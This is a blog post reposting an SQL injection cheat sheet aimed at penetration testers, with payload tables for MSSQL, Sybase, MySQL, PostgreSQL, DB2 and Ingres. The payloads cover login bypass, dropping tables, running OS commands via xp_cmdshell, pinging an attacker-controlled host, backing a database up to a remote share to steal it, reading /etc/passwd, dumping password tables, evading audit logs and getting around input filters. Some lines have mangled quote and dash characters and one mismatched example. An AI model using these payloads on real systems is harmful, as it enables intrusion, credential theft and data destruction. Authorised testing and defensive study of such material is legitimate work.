SQl Injection Queries : Full List
Do you like this story?
Here is the cheat list For all kinda SQl queries.
This paper was primarily written to aid penetration testers. I hope you find it useful. Please email me additional payloads as you find them.
» Generic – Bypass Authentication
The following payloads are generally applied to login forms with a username and password. Correctly performing these attacks will allow you to authenticate to the web application (unless otherwise stated).
Payload | Description (if any) |
realusername' OR 1=1– | Authenticate as a real user without requiring a password. |
'OR '' = ' | Allows authentication without a valid username. |
admin'– | Authenticate as user admin without a password. |
' union select 1, 'user', 'pass' 1– | Requires knowledge of column names. |
'; drop table users– | DANGEROUS! this will delete the user database if the table name is 'users'. |
» Microsoft SQL
Payload | Description (if any) |
'admin –sp_password | sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending this after your comments (–) can prevent SQL Injection queries being logged. |
select @@version | View database version. |
select @@servername | Misc. information disclosure |
select @@microsoftversion | Misc. information disclosure |
select * from master..sysservers | Misc. information disclosure |
select * from sysusers | View database usernames and passwords. |
exec master..xp_cmdshell 'ipconfig+/all' | Misc. command execution with cp_cmdshell. |
exec master..xp_cmdshell 'net+view' | Misc. command execution with cp_cmdshell. |
exec master..xp_cmdshell 'net+users' | Misc. command execution with cp_cmdshell. |
exec master..xp_cmdshell 'ping+system-controlled-by-attacker' | Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed). |
BACKUP database master to disks='\\{IP}\{sharename}\backupdb.dat' | Backup entire database to a file. This attack can be used to steal a database. |
create table myfile (line varchar(8000))" bulk insert foo from ‘c:\inetpub\wwwroot\auth.asp’" select * from myfile"– | Reading files on the filesystem. |
xp_servicecontrol (START or STOP) | Start and stop Windows Services. |
str1 + str2 OR n+n | Concat strings for blind SQL Injection tests. |
» Sybase
Payload | Description (if any) |
select @@version"– | View database version. |
select name from master..syslogins"– | Misc. information disclosure |
select name from master..sysdatabases"– | Misc. information disclosure |
convert(integer,(select+min(name)+from+syslogins+where+name>'))– | Integer conversion “error” trick. |
convert(integer,(select+min(name)+from+syslogins+where+name>'sybase'))– | An error will occur presenting the first value of the rowset (lets say its sybase). We then continue as before by placing the value into our query. An error will then present the next value in the rowset. We continue as before. |
xp_cmdshell 'ipconfig+/all' | Misc. command execution with cp_cmdshell. |
xp_cmdshell 'net+view' | Misc. command execution with cp_cmdshell. |
xp_cmdshell 'net+users' | Misc. command execution with cp_cmdshell. |
xp_cmdshell 'ping+system-controlled-by-attacker' | Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed). |
waitfor delay '0:0:5' | Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed). |
create proxy_table myfile external file at "c:\temp\file_to_read.txt" select * from myfile" | Reading files on the filesystem. |
create table myfile (record varchar(2000)) external file at "c:\temp\myfile.exe" insert into myfile values(0xAND_YOUR_BINARY_DATA)" | Write file to filesystem. |
str1 + str2 or n+n | Concat strings for blind SQL Injection tests. |
» MySQL
Payload | Description (if any) |
select @@version; | View database version. |
select host,user,db from mysql.db; | Misc. information disclosure |
select host,user,password from mysql.user; | View MySQL usernames and passwords. |
create table myfile (input TEXT); load data infile ‘/etc/passwd’ into table myfile; OR load data infile ‘/home/{user}/.rhosts’ into table myfile; select * from myfile; | Reading files on the filesystem. |
select host,user,password from user into outfile ‘/tmp/passwd’; | Write files on the filesystem. This attack is limited by the fact that you can only write to either “/tmp” or “/var/tmp”. |
select CONCAT(”a”,”b”); | Concat strings for blind SQL Injection tests. |
BENCHMARK(1000000000,MD5(’gainingtime’)) | Cause delay for blind SQL Injection tests. |
BENCHMARK(1000000000,MD5(CHAR(116))) | Cause delay for blind SQL Injection tests. Same as before, but this can be used if quotes are filtered. |
IF EXISTS (SELECT * FROM users WHERE username = ‘root’) BENCHMARK(1000000000,MD5(’gainingtime’)) | Check if username exists, if yes there will be an delay. |
IF EXISTS (SELECT * FROM users WHERE username = ‘root’) WAITFOR DELAY ‘0:0:3′ | Check if username exists, if yes there will be an delay for 3 seconds. |
» Oracle
Robert Hurlbut has put together an awesome document on Oracle SQL Injection. He seems to have far more experience in this area then I, so i will merely present a link to his blog entry on this topic (http://weblogs.asp.net/rhurlbut/archive/2004/01/24/62560.aspx).
Payload | Description (if any) |
str1 || str2 OR CONCAT (str1, str2) | Concat strings for blind SQL Injection tests. |
» PostgreSQL
Payload | Description (if any) |
select version(); | View database version. |
select current_database(); | Misc. information disclosure |
select current_user; | Misc. information disclosure |
select session_user; | Misc. information disclosure |
select current_setting(’log_connections’); | Misc. information disclosure |
select current_setting(’log_statement’); | Misc. information disclosure |
select current_setting(’port’); | Misc. information disclosure |
select current_setting(’password_encryption’); | Misc. information disclosure |
select current_setting(’krb_server_keyfile’); | Misc. information disclosure |
select current_setting(’virtual_host’); | Misc. information disclosure |
select current_setting(’port’); | Misc. information disclosure |
select current_setting(’config_file’); | Misc. information disclosure |
select current_setting(’hba_file’); | Misc. information disclosure |
select current_setting(’data_directory’); | Misc. information disclosure |
select * from pg_shadow; | View database usernames and passwords. |
select * from pg_group; | View database usernames and passwords. |
create table myfile (input TEXT); copy myfile from ‘/etc/passwd’; select * from myfile; | Read files on the filesystem. |
copy myfile to ‘/tmp/test’; | Write files to filesystem. |
str1 || str2 | Concat strings for blind SQL Injection tests. |
» DB2
Payload | Description (if any) |
Comments | select blah from foo; — comment like this |
Batching Queries Allowed? | ??? |
Database Version | select versionnumber, version_timestamp from sysibm.sysversions; |
Current Database User | select user from sysibm.sysdummy1; select session_user from sysibm.sysdummy1; |
System User for Current Connection | select system_user from sysibm.sysdummy1; |
Current Database | select current server from sysibm.sysdummy1; |
Limiting Rows Returned | SELECT foo FROM bar fetch first 1 rows only; |
Returning N Rows starting at Offset M | select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only; |
List Tables | select name from sysibm.systables; |
List Columns | select name, tbname, coltype from sysibm.syscolumns; |
List Databse Users and Passwords | Database authorities (like roles, I think) can be listed like this: select grantee from syscat.dbauth; |
FROM clause mandated in SELECTs? | Yes, use sysibm.sysdummy1: select 123 from sysibm.sysdummy1; |
UNION supported | Yes select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1; |
Enumerate Tables Privs | select * from syscat.tabauth; |
Enumerate Current Privs | select * from syscat.dbauth where grantee = current user; select * from syscat.tabauth where grantee = current user; |
Length of a string | select name, tbname, coltype from sysibm.syscolumns; — returns 3 |
Bitwise AND | This page seems to indicate that DB2 has no support for bitwise operators! |
Substring | SELECT SUBSTR(’abc’,2,1) FROM sysibm.sysdummy1; — returns b |
ASCII value of a character | select ascii(’A') from sysibm.sysdummy1; — returns 65 |
Character from ASCII value | select chr(65) from sysibm.sysdummy1; — returns ‘A’ |
Roles and passwords | N/A (I think DB2 uses OS-level user accounts for authentication.) |
List Database Procedures | ??? |
Create Users + Granting Privs | ??? |
Time Delays | ??? |
Execute OS Commands | ??? |
Write to File System | ??? |
Concatenation | SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’ select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’ |
Casting | SELECT cast(’123′ as integer) FROM sysibm.sysdummy1; SELECT cast(1 as char) FROM sysibm.sysdummy1; |
List schemas | SELECT schemaname FROM syscat.schemata; |
» Ingres
Payload | Description (if any) |
Comments | Normal “–” and C-style /**/ comments are allowed: select 123; — sdfjsdlkfj select 123; /* sdfsdf */ |
Batching Queries Allowed? | Not via DBI in PERL. Subsequent statements seem to get ignored: select blah from table where foo = 1; select … doesn’t matter this is ignored. |
Database Version | select dbmsinfo(’_version’); |
Current Database User | select dbmsinfo(’session_user’); |
System User for Current Connection | select dbmsinfo(’system_user’); |
Current Database | select dbmsinfo(’database’); |
Limiting Rows Returned | select top 10 blah from table; select first 10 blah form table; |
Returning N Rows starting at Offset M | Astoundingly, this doesn’t seem to be possible! |
List Tables | select table_name, table_owner from iitables; select relid, relowner, relloc from iirelation; select relid, relowner, relloc from iirelation where relowner != ‘$ingres’; |
List Columns | select column_name, column_datatype, table_name, table_owner from iicolumns; |
List Databse Users and Passwords | First connect to iidbdb, then: select name, password from iiuser; |
FROM clause mandated in SELECTs? | No. You don’t need to select form “dual” or anything. The following is legal: select 1; |
UNION supported | Yes. Nothing tricky here. The following is legal: select 1 union select 2; |
Enumerate Tables Privs | select table_name, permit_user, permit_type from iiaccess; |
Enumerate Current Privs | select dbmsinfo(’db_admin’); select dbmsinfo(’create_table’); select dbmsinfo(’create_procedure’); select dbmsinfo(’security_priv’); select dbmsinfo(’select_syscat’); select dbmsinfo(’db_privileges’); select dbmsinfo(’current_priv_mask’); |
Length of a string | select length(’abc’); — returns 3 |
Bitwise AND | The function “bit_and” exists, but seems hard to use. Here’s an example of ANDing 3 and 5 together. The result is a “byte” type with value \001: select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1); |
Substring | select substr(’abc’, 2, 1); — returns ‘b’ |
ASCII value of a character | ??? (The “ascii” function exists, but doesn’t seem to do what I’d expect.) |
Roles and passwords | First you need to connect to iidbdb, then: select roleid, rolepass from iirole; |
List Database Procedures | First you need to connect to iidbdb, then: select dbp_name, dbp_owner from iiprocedure; |
Create Users + Granting Privs | First you need to connect to iidbdb, then: create user pm with password = ‘password’; grant all on current installation to pm; |
Time Delays | ??? |
Execute OS Commands | ??? |
Write to File System | ??? |
Concatenation | select ‘abc’ || ‘def’; |
Casting | select cast(123 as varchar); select cast(’123′ as integer); |
» Bypass SQL Injection Filters
Payload | Description (if any) |
select password from tablename where username = concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39)) into outfile concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39)) | Writing info into files without single quotes (example). You must specify a new file (it may not exist) and give the correct pathname. |
select * from login where user = char(39,97,39) | Using char() to bypass restrictions. |
References and Credits:
Subscribe to:
Post Comments (Atom)
0 Responses to “SQl Injection Queries : Full List”
Post a Comment